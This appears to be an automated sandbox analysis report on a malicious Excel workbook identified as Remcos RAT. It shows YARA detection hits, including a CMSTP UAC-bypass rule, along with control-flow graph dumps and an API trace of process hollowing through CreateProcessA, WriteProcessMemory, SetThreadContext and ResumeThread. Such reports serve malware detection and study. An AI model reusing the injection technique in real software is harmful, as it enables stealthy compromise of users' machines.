                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Disassembly

                  Code Analysis

                  Call Graph

                  • Entrypoint
                  • Decryption Function
                  • Executed
                  • Not Executed
                  • Show Help
                  callgraph 1 Error: Graph is empty

                  Module: Sheet1

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet1"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: Sheet2

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet2"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: Sheet3

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet3"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: ThisWorkbook

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "ThisWorkbook"

                  2

                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Reset < >

                    Execution Graph

                    Execution Coverage:9.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:20%
                    Total number of Nodes:25
                    Total number of Limit Nodes:1
                    execution_graph 8274 1b77d28 8275 1b77d4f 8274->8275 8278 1b79689 8275->8278 8279 1b796cb 8278->8279 8280 1b77e5a 8279->8280 8287 1b78e61 WriteProcessMemory 8279->8287 8288 1b78e68 WriteProcessMemory 8279->8288 8289 1b791f4 8279->8289 8293 1b79200 8279->8293 8297 1b78b18 8279->8297 8301 1b78b20 8279->8301 8305 1b78a30 8279->8305 8309 1b78a28 8279->8309 8287->8279 8288->8279 8290 1b79287 CreateProcessA 8289->8290 8292 1b794e5 8290->8292 8294 1b79287 CreateProcessA 8293->8294 8296 1b794e5 8294->8296 8298 1b78b21 Wow64SetThreadContext 8297->8298 8300 1b78be7 8298->8300 8300->8279 8302 1b78b69 Wow64SetThreadContext 8301->8302 8304 1b78be7 8302->8304 8304->8279 8306 1b78a74 ResumeThread 8305->8306 8308 1b78ac6 8306->8308 8308->8279 8310 1b78a74 ResumeThread 8309->8310 8312 1b78ac6 8310->8312 8312->8279

                    Executed Functions

                    Function 01B79689 Relevance: .7, Instructions: 659COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6cab009f17ece5e36771b547621ed156559d64c72fbc6945444037f358b572c7
                    • Instruction ID: 13144f66afdba9a843698368b0440208a32bb450c22d369d81c0437fefbff49f
                    • Opcode Fuzzy Hash: 6cab009f17ece5e36771b547621ed156559d64c72fbc6945444037f358b572c7
                    • Instruction Fuzzy Hash: F7620674E002298FDB68DF69C884BDDBBF2AF89314F5481EAD409A7295DB305E85CF50
                    Function 01B72C88 Relevance: .5, Instructions: 498COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a5abb6a1cd7f91c445216bbdfb755bc718aa5f04a5c8459755e426914a2840c6
                    • Instruction ID: d4167efba2012f27f79cb4233ffa95bc67f2f1844e4284611f31a7d8786fa6e6
                    • Opcode Fuzzy Hash: a5abb6a1cd7f91c445216bbdfb755bc718aa5f04a5c8459755e426914a2840c6
                    • Instruction Fuzzy Hash: 01223C34A01248AFDB19DFA8D484A9DFBF2FF48314F248599E414AB361C775ED86CB90
                    Function 01D73A08 Relevance: 8.0, Strings: 6, Instructions: 459COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 1d73a08-1d73a2b 1 1d73a31-1d73a36 0->1 2 1d73be9-1d73c35 0->2 3 1d73a4e-1d73a52 1->3 4 1d73a38-1d73a3e 1->4 12 1d73dc1-1d73e0b 2->12 13 1d73c3b-1d73c40 2->13 8 1d73b90-1d73b9a 3->8 9 1d73a58-1d73a5a 3->9 6 1d73a42-1d73a4c 4->6 7 1d73a40 4->7 6->3 7->3 14 1d73b9c-1d73ba5 8->14 15 1d73ba8-1d73bae 8->15 10 1d73a5c-1d73a68 9->10 11 1d73a6a 9->11 16 1d73a6c-1d73a6e 10->16 11->16 29 1d73f62-1d73fa6 12->29 30 1d73e11-1d73e16 12->30 17 1d73c42-1d73c48 13->17 18 1d73c58-1d73c5c 13->18 19 1d73bb4-1d73bc0 15->19 20 1d73bb0-1d73bb2 15->20 16->8 22 1d73a74-1d73a78 16->22 23 1d73c4c-1d73c56 17->23 24 1d73c4a 17->24 25 1d73c62-1d73c64 18->25 26 1d73d71-1d73d7b 18->26 27 1d73bc2-1d73be6 19->27 20->27 33 1d73a7a-1d73a96 22->33 34 1d73a98 22->34 23->18 24->18 35 1d73c66-1d73c72 25->35 36 1d73c74 25->36 31 1d73d7d-1d73d86 26->31 32 1d73d89-1d73d8f 26->32 83 1d73fb4-1d73fcc 29->83 84 1d73fa8-1d73faa 29->84 38 1d73e2e-1d73e32 30->38 39 1d73e18-1d73e1e 30->39 40 1d73d95-1d73da1 32->40 41 1d73d91-1d73d93 32->41 44 1d73a9a-1d73a9c 33->44 34->44 43 1d73c76-1d73c78 35->43 36->43 50 1d73f0f-1d73f19 38->50 51 1d73e38-1d73e3a 38->51 46 1d73e22-1d73e2c 39->46 47 1d73e20 39->47 48 1d73da3-1d73dbe 40->48 41->48 43->26 52 1d73c7e-1d73c9d 43->52 44->8 53 1d73aa2-1d73aa6 44->53 46->38 47->38 61 1d73f27-1d73f2d 50->61 62 1d73f1b-1d73f24 50->62 56 1d73e3c-1d73e48 51->56 57 1d73e4a 51->57 89 1d73c9f-1d73cab 52->89 90 1d73cad 52->90 58 1d73ab9 53->58 59 1d73aa8-1d73ab7 53->59 69 1d73e4c-1d73e4e 56->69 57->69 65 1d73abb-1d73abd 58->65 59->65 66 1d73f33-1d73f3f 61->66 67 1d73f2f-1d73f31 61->67 65->8 74 1d73ac3-1d73ac5 65->74 72 1d73f41-1d73f5f 66->72 67->72 69->50 73 1d73e54-1d73e58 69->73 80 1d73e5a-1d73e76 73->80 81 1d73e78 73->81 77 1d73ac7-1d73acd 74->77 78 1d73adf-1d73af9 74->78 85 1d73ad1-1d73add 77->85 86 1d73acf 77->86 97 1d73afb-1d73afe 78->97 98 1d73b08-1d73b1e 78->98 87 1d73e7a-1d73e7c 80->87 81->87 103 1d73fd0-1d73fd2 83->103 104 1d73fce 83->104 84->83 85->78 86->78 87->50 91 1d73e82-1d73e85 87->91 92 1d73caf-1d73cb1 89->92 90->92 102 1d73e8f-1d73e95 91->102 92->26 100 1d73cb7-1d73cd6 92->100 97->98 109 1d73b36-1d73b8d 98->109 110 1d73b20-1d73b26 98->110 117 1d73cee-1d73d0d 100->117 118 1d73cd8-1d73cde 100->118 108 1d73e9b-1d73e9d 102->108 106 1d73fdc-1d73fdd 103->106 104->106 113 1d73eb5-1d73f0c 108->113 114 1d73e9f-1d73ea5 108->114 115 1d73b2a-1d73b2c 110->115 116 1d73b28 110->116 119 1d73ea7 114->119 120 1d73ea9-1d73eab 114->120 115->109 116->109 126 1d73d14-1d73d62 117->126 127 1d73d0f-1d73d12 117->127 122 1d73ce2-1d73ce4 118->122 123 1d73ce0 118->123 119->113 120->113 122->117 123->117 128 1d73d67-1d73d6e 126->128 127->128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$4'p$4'p$4'p$4'p
                    • API String ID: 0-2314922075
                    • Opcode ID: 6e7297e656de47acd1b62d6d7fca116e01fcb27986134088b3c15e9086c5b71a
                    • Instruction ID: 09c9fdb5207b7745ee6a913cb34cd4c5456c3fed63602bc3972d4ef4bcda94f9
                    • Opcode Fuzzy Hash: 6e7297e656de47acd1b62d6d7fca116e01fcb27986134088b3c15e9086c5b71a
                    • Instruction Fuzzy Hash: 7BE11531B00305AFDB159E7DD8506AABFF2BFC9210F2484AAD945CB252EB71CD41D7A2
                    Function 01D71420 Relevance: 7.9, Strings: 6, Instructions: 384COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 1d71420-1d71445 136 1d71603-1d71637 135->136 137 1d7144b-1d71450 135->137 147 1d71647 136->147 148 1d71639-1d71645 136->148 138 1d71452-1d71458 137->138 139 1d71468-1d7146c 137->139 141 1d7145c-1d71466 138->141 142 1d7145a 138->142 143 1d715b3-1d715bd 139->143 144 1d71472-1d71474 139->144 141->139 142->139 149 1d715bf-1d715c8 143->149 150 1d715cb-1d715d1 143->150 145 1d71476-1d71482 144->145 146 1d71484 144->146 151 1d71486-1d71488 145->151 146->151 152 1d71649-1d7164b 147->152 148->152 153 1d715d7-1d715e3 150->153 154 1d715d3-1d715d5 150->154 151->143 156 1d7148e-1d71495 151->156 157 1d716f4-1d716fe 152->157 158 1d71651-1d71669 152->158 159 1d715e5-1d71600 153->159 154->159 156->136 162 1d7149b-1d714a0 156->162 160 1d71700-1d71706 157->160 161 1d71709-1d7170f 157->161 173 1d71744-1d7178c 158->173 174 1d7166f-1d71674 158->174 164 1d71715-1d71721 161->164 165 1d71711-1d71713 161->165 166 1d714a2-1d714a8 162->166 167 1d714b8-1d714c6 162->167 170 1d71723-1d71741 164->170 165->170 171 1d714ac-1d714b6 166->171 172 1d714aa 166->172 167->143 182 1d714cc-1d714e9 167->182 171->167 172->167 186 1d7178e-1d7179a 173->186 187 1d7179c 173->187 178 1d71676-1d7167c 174->178 179 1d7168c-1d71696 174->179 183 1d71680-1d7168a 178->183 184 1d7167e 178->184 188 1d7169b-1d716ac 179->188 182->143 202 1d714ef-1d71514 182->202 183->179 184->179 190 1d7179e-1d717a0 186->190 187->190 188->173 201 1d716b2-1d716b7 188->201 193 1d717a6-1d717a8 190->193 194 1d7185f-1d71869 190->194 199 1d717c2-1d717cb 193->199 200 1d717aa-1d717b0 193->200 197 1d71877-1d7187d 194->197 198 1d7186b-1d71874 194->198 203 1d71883-1d7188f 197->203 204 1d7187f-1d71881 197->204 209 1d717cf-1d717de 199->209 210 1d717cd 199->210 205 1d717b4-1d717c0 200->205 206 1d717b2 200->206 207 1d716cf-1d716f1 201->207 208 1d716b9-1d716bf 201->208 202->143 227 1d7151a-1d7151c 202->227 211 1d71891-1d718ad 203->211 204->211 205->199 206->199 212 1d716c3-1d716cd 208->212 213 1d716c1 208->213 221 1d717e0-1d717eb 209->221 222 1d717ed-1d71833 209->222 210->209 212->207 213->207 225 1d71853-1d7185c 221->225 244 1d71835 222->244 245 1d7183f-1d71849 222->245 229 1d71536-1d71541 227->229 230 1d7151e-1d71524 227->230 235 1d71543-1d71549 229->235 236 1d71559-1d715b0 229->236 232 1d71526 230->232 233 1d71528-1d71534 230->233 232->229 233->229 239 1d7154d-1d7154f 235->239 240 1d7154b 235->240 239->236 240->236 247 1d7183a 244->247 246 1d7184b 245->246 245->247 246->225 247->245
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p$$p
                    • API String ID: 0-3219492093
                    • Opcode ID: 27eedf0190d1532935dff1e0c3d2d163205831f917b537940dd6dc6a01a0a6a9
                    • Instruction ID: 8332e0f4fbb4baaf578632b67c3a8801e31e0bd9c186a36fc4c4a5c7a2cc38a2
                    • Opcode Fuzzy Hash: 27eedf0190d1532935dff1e0c3d2d163205831f917b537940dd6dc6a01a0a6a9
                    • Instruction Fuzzy Hash: BCC10635B003119FDB189F6CD851A6AFBF6AFC8310B28C26AD945CB252EB31DD42C791
                    Function 01D752B4 Relevance: 7.6, Strings: 5, Instructions: 1323COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 248 1d752b4-1d752b7 249 1d752bd-1d752c5 248->249 250 1d752b9-1d752bb 248->250 251 1d752c7-1d752cc 249->251 252 1d752dd-1d752e1 249->252 250->249 253 1d752d1-1d752db 251->253 254 1d752cd 251->254 255 1d752e7-1d752eb 252->255 256 1d7540c-1d75416 252->256 253->252 254->253 257 1d752cf 254->257 258 1d752ed-1d752fe 255->258 259 1d7532b 255->259 260 1d75424-1d7542a 256->260 261 1d75418-1d75421 256->261 257->252 271 1d75464-1d75473 258->271 272 1d75304-1d75309 258->272 262 1d7532d-1d7532f 259->262 264 1d75430-1d7543c 260->264 265 1d7542c-1d7542e 260->265 262->256 266 1d75335-1d75339 262->266 268 1d7543e-1d75461 264->268 265->268 266->256 270 1d7533f-1d75343 266->270 270->256 274 1d75349-1d7536f 270->274 281 1d75475-1d75481 271->281 275 1d75321-1d75329 272->275 276 1d7530b-1d75311 272->276 274->256 290 1d75375-1d75379 274->290 275->262 277 1d75315-1d7531f 276->277 278 1d75313 276->278 277->275 278->275 281->281 284 1d75483-1d754b3 281->284 285 1d756b6-1d756c3 284->285 286 1d754b9-1d754be 284->286 288 1d754d6-1d754da 286->288 289 1d754c0-1d754c6 286->289 292 1d754e0-1d754e2 288->292 293 1d7565f-1d75669 288->293 294 1d754ca-1d754d4 289->294 295 1d754c8 289->295 296 1d7539c 290->296 297 1d7537b-1d75384 290->297 300 1d754e4-1d754f0 292->300 301 1d754f2 292->301 302 1d75675-1d7567b 293->302 303 1d7566b-1d75672 293->303 294->288 295->288 304 1d7539f-1d753ac 296->304 298 1d75386-1d75389 297->298 299 1d7538b-1d75398 297->299 306 1d7539a 298->306 299->306 307 1d754f4-1d754f6 300->307 301->307 308 1d75681-1d7568d 302->308 309 1d7567d-1d7567f 302->309 313 1d753b2-1d75409 304->313 306->304 307->293 311 1d754fc-1d7551b 307->311 312 1d7568f-1d756b3 308->312 309->312 320 1d7551d-1d75529 311->320 321 1d7552b 311->321 322 1d7552d-1d7552f 320->322 321->322 322->293 323 1d75535-1d75539 322->323 323->293 324 1d7553f-1d75543 323->324 325 1d75556 324->325 326 1d75545-1d75554 324->326 327 1d75558-1d7555a 325->327 326->327 327->293 328 1d75560-1d75564 327->328 328->293 329 1d7556a-1d75589 328->329 332 1d755a1-1d755ac 329->332 333 1d7558b-1d75591 329->333 336 1d755ae-1d755b1 332->336 337 1d755bb-1d755d7 332->337 334 1d75595-1d75597 333->334 335 1d75593 333->335 334->332 335->332 336->337 338 1d755f4-1d755fe 337->338 339 1d755d9-1d755ec 337->339 340 1d75602-1d75650 338->340 341 1d75600 338->341 339->338 342 1d75655-1d7565c 340->342 341->342
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (op$(op$L4p$L4p$L4p
                    • API String ID: 0-2509652690
                    • Opcode ID: 7346659c00055b701c961b7ed4298a583bc1624d72cc2bbf8f5fc60c26c9e3c4
                    • Instruction ID: 96b0b081e5e2a70ac7262b0ad7f48d54e0fc4d93f041324703fc88e76b06027d
                    • Opcode Fuzzy Hash: 7346659c00055b701c961b7ed4298a583bc1624d72cc2bbf8f5fc60c26c9e3c4
                    • Instruction Fuzzy Hash: 44B12831700344DFDF159F6CE850BAEBFA2AF89311F148466EA568B292EB71D842C753
                    Function 01D743E8 Relevance: 6.6, Strings: 5, Instructions: 380COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 349 1d743e8-1d7440b 350 1d745e6-1d745f7 349->350 351 1d74411-1d74416 349->351 359 1d745f8-1d74601 350->359 352 1d7442e-1d74432 351->352 353 1d74418-1d7441e 351->353 357 1d74593-1d7459d 352->357 358 1d74438-1d7443c 352->358 355 1d74422-1d7442c 353->355 356 1d74420 353->356 355->352 356->352 360 1d7459f-1d745a8 357->360 361 1d745ab-1d745b1 357->361 362 1d7444f 358->362 363 1d7443e-1d7444d 358->363 359->359 365 1d74602-1d74612 359->365 366 1d745b7-1d745c3 361->366 367 1d745b3-1d745b5 361->367 364 1d74451-1d74453 362->364 363->364 364->357 369 1d74459-1d74479 364->369 370 1d74614-1d74619 365->370 371 1d7465f-1d74699 365->371 372 1d745c5-1d745e3 366->372 367->372 390 1d7447b-1d74496 369->390 391 1d74498 369->391 373 1d74631-1d74649 370->373 374 1d7461b-1d74621 370->374 382 1d7469b-1d746b6 371->382 383 1d746b8 371->383 384 1d74657-1d7465c 373->384 385 1d7464b-1d7464d 373->385 379 1d74625-1d7462f 374->379 380 1d74623 374->380 379->373 380->373 388 1d746ba-1d746bc 382->388 383->388 385->384 393 1d746c2-1d746c6 388->393 394 1d7474a-1d74754 388->394 397 1d7449a-1d7449c 390->397 391->397 393->394 398 1d746cc-1d746e9 393->398 395 1d74756-1d7475d 394->395 396 1d74760-1d74766 394->396 399 1d7476c-1d74778 396->399 400 1d74768-1d7476a 396->400 397->357 403 1d744a2-1d744a4 397->403 408 1d746ef-1d746f1 398->408 409 1d74799-1d7479e 398->409 405 1d7477a-1d74796 399->405 400->405 406 1d744a6-1d744b2 403->406 407 1d744b4 403->407 410 1d744b6-1d744b8 406->410 407->410 413 1d746f3-1d746f9 408->413 414 1d7470b-1d74720 408->414 409->408 410->357 416 1d744be-1d744de 410->416 417 1d746fd-1d74709 413->417 418 1d746fb 413->418 424 1d74726-1d74744 414->424 425 1d747a3-1d747d4 414->425 428 1d744f6-1d744fa 416->428 429 1d744e0-1d744e6 416->429 417->414 418->414 424->394 431 1d747d6-1d747e2 425->431 432 1d747e4 425->432 435 1d74514-1d74518 428->435 436 1d744fc-1d74502 428->436 433 1d744ea-1d744ec 429->433 434 1d744e8 429->434 437 1d747e6-1d747e8 431->437 432->437 433->428 434->428 442 1d7451f-1d74521 435->442 438 1d74506-1d74512 436->438 439 1d74504 436->439 440 1d7480a-1d74814 437->440 441 1d747ea-1d747ee 437->441 438->435 439->435 444 1d74816-1d7481b 440->444 445 1d7481e-1d74824 440->445 441->440 443 1d747f0-1d74807 441->443 446 1d74523-1d74529 442->446 447 1d74539-1d74590 442->447 449 1d74826-1d74828 445->449 450 1d7482a-1d74836 445->450 451 1d7452d-1d7452f 446->451 452 1d7452b 446->452 455 1d74838-1d74852 449->455 450->455 451->447 452->447
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p
                    • API String ID: 0-2334450948
                    • Opcode ID: c3a593c2f091c1204c8701dc31c232cd560dae2dbce33f6a920eaa8ab90e0426
                    • Instruction ID: afe68f0fbd8cd3e4a31053dac28415f2a8cc4dcbf6bb2777e239f2e5a24a9bd3
                    • Opcode Fuzzy Hash: c3a593c2f091c1204c8701dc31c232cd560dae2dbce33f6a920eaa8ab90e0426
                    • Instruction Fuzzy Hash: 12C107317043519FDB169A7CD410B7ABFE2AFCA310F24806BD985CB292EB75D842C7A1
                    Function 01D743E0 Relevance: 3.8, Strings: 3, Instructions: 100COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 459 1d743e0-1d7440b 461 1d745e6-1d745f7 459->461 462 1d74411-1d74416 459->462 470 1d745f8-1d74601 461->470 463 1d7442e-1d74432 462->463 464 1d74418-1d7441e 462->464 468 1d74593-1d7459d 463->468 469 1d74438-1d7443c 463->469 466 1d74422-1d7442c 464->466 467 1d74420 464->467 466->463 467->463 471 1d7459f-1d745a8 468->471 472 1d745ab-1d745b1 468->472 473 1d7444f 469->473 474 1d7443e-1d7444d 469->474 470->470 476 1d74602-1d74612 470->476 477 1d745b7-1d745c3 472->477 478 1d745b3-1d745b5 472->478 475 1d74451-1d74453 473->475 474->475 475->468 480 1d74459-1d74479 475->480 481 1d74614-1d74619 476->481 482 1d7465f-1d74699 476->482 483 1d745c5-1d745e3 477->483 478->483 501 1d7447b-1d74496 480->501 502 1d74498 480->502 484 1d74631-1d74649 481->484 485 1d7461b-1d74621 481->485 493 1d7469b-1d746b6 482->493 494 1d746b8 482->494 495 1d74657-1d7465c 484->495 496 1d7464b-1d7464d 484->496 490 1d74625-1d7462f 485->490 491 1d74623 485->491 490->484 491->484 499 1d746ba-1d746bc 493->499 494->499 496->495 504 1d746c2-1d746c6 499->504 505 1d7474a-1d74754 499->505 508 1d7449a-1d7449c 501->508 502->508 504->505 509 1d746cc-1d746e9 504->509 506 1d74756-1d7475d 505->506 507 1d74760-1d74766 505->507 510 1d7476c-1d74778 507->510 511 1d74768-1d7476a 507->511 508->468 514 1d744a2-1d744a4 508->514 519 1d746ef-1d746f1 509->519 520 1d74799-1d7479e 509->520 516 1d7477a-1d74796 510->516 511->516 517 1d744a6-1d744b2 514->517 518 1d744b4 514->518 521 1d744b6-1d744b8 517->521 518->521 524 1d746f3-1d746f9 519->524 525 1d7470b-1d74720 519->525 520->519 521->468 527 1d744be-1d744de 521->527 528 1d746fd-1d74709 524->528 529 1d746fb 524->529 535 1d74726-1d74744 525->535 536 1d747a3-1d747d4 525->536 539 1d744f6-1d744fa 527->539 540 1d744e0-1d744e6 527->540 528->525 529->525 535->505 542 1d747d6-1d747e2 536->542 543 1d747e4 536->543 546 1d74514-1d74518 539->546 547 1d744fc-1d74502 539->547 544 1d744ea-1d744ec 540->544 545 1d744e8 540->545 548 1d747e6-1d747e8 542->548 543->548 544->539 545->539 553 1d7451f-1d74521 546->553 549 1d74506-1d74512 547->549 550 1d74504 547->550 551 1d7480a-1d74814 548->551 552 1d747ea-1d747ee 548->552 549->546 550->546 555 1d74816-1d7481b 551->555 556 1d7481e-1d74824 551->556 552->551 554 1d747f0-1d74807 552->554 557 1d74523-1d74529 553->557 558 1d74539-1d74590 553->558 560 1d74826-1d74828 556->560 561 1d7482a-1d74836 556->561 562 1d7452d-1d7452f 557->562 563 1d7452b 557->563 566 1d74838-1d74852 560->566 561->566 562->558 563->558
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$$p$$p
                    • API String ID: 0-2931952147
                    • Opcode ID: 2f5e26ce46b0764f45e5f928867af9e3972cfbe63c531c2c83d89b0b11fcb7a3
                    • Instruction ID: b2081c09697720dc3f01bf6d02c45281d1371a19b66767173b414b737117b3c8
                    • Opcode Fuzzy Hash: 2f5e26ce46b0764f45e5f928867af9e3972cfbe63c531c2c83d89b0b11fcb7a3
                    • Instruction Fuzzy Hash: 8C313570A00215DFEF269E2CD41077A7BF1AF8C215F148136D944DB652FBB1D881CB61
                    Function 01D74DF7 Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 570 1d74df7-1d74e0f 572 1d74e16-1d74e18 570->572 573 1d74e30-1d74e87 572->573 574 1d74e1a-1d74e20 572->574 576 1d74e24-1d74e26 574->576 577 1d74e22 574->577 576->573 577->573
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p
                    • API String ID: 0-3973980265
                    • Opcode ID: 2a5657361956f09d5b338a4cb2079e53c4d02fcfb2d9a18a7f2d7c9107027ecd
                    • Instruction ID: 799a55ffb33031cfaefcc4ed264af98e45a5213a3ed9232ef7ff84ccb776555e
                    • Opcode Fuzzy Hash: 2a5657361956f09d5b338a4cb2079e53c4d02fcfb2d9a18a7f2d7c9107027ecd
                    • Instruction Fuzzy Hash: C5E0D831708240DADF5B6678A0313ADBFA26FC6171F54809BC5C08624AEB31CD16C392
                    Function 01B791F4 Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 578 1b791f4-1b79299 580 1b792e2-1b7930a 578->580 581 1b7929b-1b792b2 578->581 585 1b79350-1b793a6 580->585 586 1b7930c-1b79320 580->586 581->580 584 1b792b4-1b792b9 581->584 587 1b792dc-1b792df 584->587 588 1b792bb-1b792c5 584->588 594 1b793ec-1b794e3 CreateProcessA 585->594 595 1b793a8-1b793bc 585->595 586->585 596 1b79322-1b79327 586->596 587->580 589 1b792c7 588->589 590 1b792c9-1b792d8 588->590 589->590 590->590 593 1b792da 590->593 593->587 614 1b794e5-1b794eb 594->614 615 1b794ec-1b795d1 594->615 595->594 604 1b793be-1b793c3 595->604 597 1b7934a-1b7934d 596->597 598 1b79329-1b79333 596->598 597->585 601 1b79337-1b79346 598->601 602 1b79335 598->602 601->601 603 1b79348 601->603 602->601 603->597 606 1b793e6-1b793e9 604->606 607 1b793c5-1b793cf 604->607 606->594 608 1b793d3-1b793e2 607->608 609 1b793d1 607->609 608->608 611 1b793e4 608->611 609->608 611->606 614->615 627 1b795d3-1b795d7 615->627 628 1b795e1-1b795e5 615->628 627->628 629 1b795d9 627->629 630 1b795e7-1b795eb 628->630 631 1b795f5-1b795f9 628->631 629->628 630->631 632 1b795ed 630->632 633 1b795fb-1b795ff 631->633 634 1b79609-1b7960d 631->634 632->631 633->634 635 1b79601 633->635 636 1b79643-1b7964e 634->636 637 1b7960f-1b79638 634->637 635->634 641 1b7964f 636->641 637->636 641->641
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01B794C7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: ad80bc55231cf41022183d615ddddabd72cd3f2d7b98b33185953a401fcc0876
                    • Instruction ID: 56a4572bd2a7d81c6091077c270ee7821ceeb69f37a2a3fc580218a8ac6c0b4c
                    • Opcode Fuzzy Hash: ad80bc55231cf41022183d615ddddabd72cd3f2d7b98b33185953a401fcc0876
                    • Instruction Fuzzy Hash: 30C13871D002198FDF24DFA8C880BEDBBB1BF09314F0491AAD959B7290DB749A85CF94
                    Function 01B79200 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
